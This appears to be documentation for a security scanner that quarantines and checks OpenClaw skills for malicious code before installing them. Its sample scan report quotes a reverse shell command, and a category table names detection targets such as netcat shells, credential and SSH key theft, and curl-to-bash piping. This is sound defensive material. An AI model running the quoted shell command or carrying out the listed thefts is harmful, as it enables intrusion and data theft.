Like a bomb-sniffing dog for OpenClaw skills
Sniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.
```bash
# Sniff out threats before installing
openclaw skill bomb-dog-sniff scan ./downloaded-skill

# Safe install from clawhub (auto-downloads, sniffs, installs if clean)
openclaw skill bomb-dog-sniff safe-install cool-skill

# Audit an already-installed skill
openclaw skill bomb-dog-sniff audit bird

# Batch scan multiple skills
openclaw skill bomb-dog-sniff batch skills-to-audit.txt
```
Scan a skill directory for malicious patterns.
```bash
openclaw skill bomb-dog-sniff scan <path> [options]
```

Options:

```
-j, --json          Output JSON only
-v, --verbose       Show detailed findings
-t, --threshold N   Set risk threshold (default: 40)
-h, --help          Show help
```

Example:

```bash
openclaw skill bomb-dog-sniff scan ./untrusted-skill
openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json
```
Output:
```
🔍 Bomb-Dog-Sniff Security Scanner v1.2.0
Target: /home/user/skills/untrusted-skill

🔴 CRITICAL (2)
──────────────────────────────────────────────────
crypto_harvester: scripts/wallet.js:23
  Crypto wallet private key harvesting detected
  Code: const privateKey = "a1b2c3..."
  Confidence: high
reverse_shell: scripts/backdoor.sh:5
  Reverse shell or remote code execution detected
  Code: bash -i >& /dev/tcp/192.168.1.100/4444
  Confidence: high

🟠 HIGH (1)
──────────────────────────────────────────────────
pipe_bash: install.sh:12
  Dangerous curl | bash pattern detected
  Confidence: high

═══════════════════════════════════════════════════
SCAN SUMMARY
═══════════════════════════════════════════════════
☠️ Risk Score: 75/100
Risk Level: MALICIOUS
Duration: 125ms
Files Scanned: 12/15
Files Skipped: 3 (binary/empty/large)
Findings: 3

Severity Breakdown:
  🔴 CRITICAL: 2
  🟠 HIGH: 1

📋 Recommendation:
  MALICIOUS - Do not install. Found 3 critical security issues.

Scan ID: bds-20260208-a1b2c3d4
```
Download from clawhub/GitHub, scan, and install only if safe.
```bash
openclaw skill bomb-dog-sniff safe-install <source> [options]
```

Source:
- ClawHub skill name: bird
- GitHub URL: https://github.com/user/skill
- Local path: ./local-skill

Options:

```
--threshold N   Set risk threshold (default: 39)
--dry-run       Scan only, don't install
--verbose       Show all findings
```

Example:

```bash
# Install with default threshold (39)
openclaw skill bomb-dog-sniff safe-install bird

# Stricter threshold
openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20

# Scan only (dry run)
openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run

# GitHub source
openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill
```
Audit an already-installed skill.
```bash
openclaw skill bomb-dog-sniff audit <skill-name> [options]
```

Example:

```bash
openclaw skill bomb-dog-sniff audit notion
```
Scan multiple skills from a list file.
```bash
openclaw skill bomb-dog-sniff batch <list-file>
```

Example list file (skills.txt):

```
# My installed skills to audit
bird
notion
gog
slack
./custom-skill
# Commented lines are ignored
# old-skill
```

Run:

```bash
openclaw skill bomb-dog-sniff batch skills.txt
```
bomb-dog-sniff scans for these threat categories:
| Category | Severity | Examples Detected |
|---|---|---|
| crypto_harvester | CRITICAL | Private key extraction, wallet exports, mnemonic theft |
| credential_theft | CRITICAL | Environment variable exfiltration, config file theft, SSH key theft |
| reverse_shell | CRITICAL | Netcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code |
| keylogger | CRITICAL | Keyboard capture with exfiltration, clipboard theft, password field monitoring |
| encoded_payload | HIGH | Base64 execution chains, hex escapes with eval context, obfuscated code |
| suspicious_api | HIGH | Pastebin/ngrok/webhook destinations, dynamic URL construction with secrets |
| pipe_bash | HIGH | `curl \| bash`, `wget \| sh` patterns |
| deposit_scam | HIGH | "Send ETH to 0x...", payment prompts in unexpected contexts |
| supply_chain | HIGH | Typosquatting, dynamic requires, suspicious postinstall scripts |
| prototype_pollution | HIGH | Dangerous object merging, __proto__ manipulation |
| malicious_script | CRITICAL | Pre/postinstall doing network/exec operations, modifying other packages |
| network_exfil | MEDIUM | File reading followed by network transmission |
| file_tamper | CRITICAL | .bashrc modification, crontab editing, SSH authorized_keys manipulation |

| Score | Risk Level | Action |
|---|---|---|
| 0-19 | SAFE ✅ | Install freely |
| 20-39 | LOW ⚠️ | Review recommended |
| 40-69 | SUSPICIOUS 🚫 | Blocked by default |
| 70-100 | MALICIOUS ☠️ | Never install |

Each finding adds to the score:
Confidence multipliers:
Score caps at 100.
```
1. QUARANTINE
   ├── Skill downloaded to /tmp/bds-q-<random>/
   ├── Randomized, non-predictable directory name
   └── Restricted permissions (0o700)
2. SCAN
   ├── Check all files against detection patterns
   ├── Skip binary files, empty files, files >10MB
   ├── Calculate entropy for encoded payload detection
   ├── Apply confidence multipliers
   └── Generate findings report
3. DECISION
   ├── Risk > threshold? → BLOCK & DELETE
   └── Risk ≤ threshold? → PROCEED
4. INSTALL (if passed)
   ├── Move from quarantine to skills directory
   └── Backup existing installation (max 5 backups)
5. CLEANUP
   └── Securely remove quarantine directory
```
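
The quarantine and pre-scan steps of the workflow above, as an added Node.js sketch; this is not bomb-dog-sniff's own code. The function names, the symlink rule, the 8 KiB sample size and the NUL-byte binary heuristic are assumptions; the `bds-q-` prefix, `0o700` mode and 10MB limit come from the workflow.

```javascript
// Added example; function names are hypothetical, not bomb-dog-sniff's API.
const fs = require('fs');
const os = require('os');
const path = require('path');

const MAX_BYTES = 10 * 1024 * 1024; // page: skip files >10MB

// Step 1: mkdtemp appends random characters to the prefix and creates the
// directory itself, so an already existing bds-q-* path is never adopted.
function makeQuarantine() {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'bds-q-'));
  fs.chmodSync(dir, 0o700); // owner-only, independent of umask
  return dir;
}

// Step 2: classify a file as 'scan' or 'skip:<reason>' before pattern matching.
function triage(file) {
  const st = fs.lstatSync(file);
  if (st.isSymbolicLink()) return 'skip:symlink'; // assumption: never follow links
  if (!st.isFile()) return 'skip:special';
  if (st.size === 0) return 'skip:empty';
  if (st.size > MAX_BYTES) return 'skip:large';
  const head = Buffer.alloc(Math.min(st.size, 8192));
  const fd = fs.openSync(file, 'r');
  try { fs.readSync(fd, head, 0, head.length, 0); } finally { fs.closeSync(fd); }
  return head.includes(0) ? 'skip:binary' : 'scan'; // NUL-byte heuristic (assumption)
}

// Step 2: Shannon entropy in bits per character; long high-entropy string
// literals are candidates for the encoded_payload category.
function shannonEntropy(text) {
  const counts = new Map();
  let total = 0;
  for (const ch of text) { counts.set(ch, (counts.get(ch) || 0) + 1); total++; }
  let bits = 0;
  for (const n of counts.values()) bits -= (n / total) * Math.log2(n / total);
  return bits;
}
```

Using `lstat` rather than `stat` in `triage` keeps a symlink planted inside a downloaded skill from steering the scanner to files outside the quarantine directory.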
```bash
# Set custom skills directory
export OPENCLAW_SKILLS_DIR=/path/to/skills

# Set default risk threshold
export BOMB_DOG_THRESHOLD=25
```
Add to your skill's package.json:
```json
{
  "bomb-dog-sniff": {
    "riskThreshold": 25,
    "excludedCategories": ["network_exfil"]
  }
}
```
Add to your CI pipeline:
# .github/workflows/skill-security.yml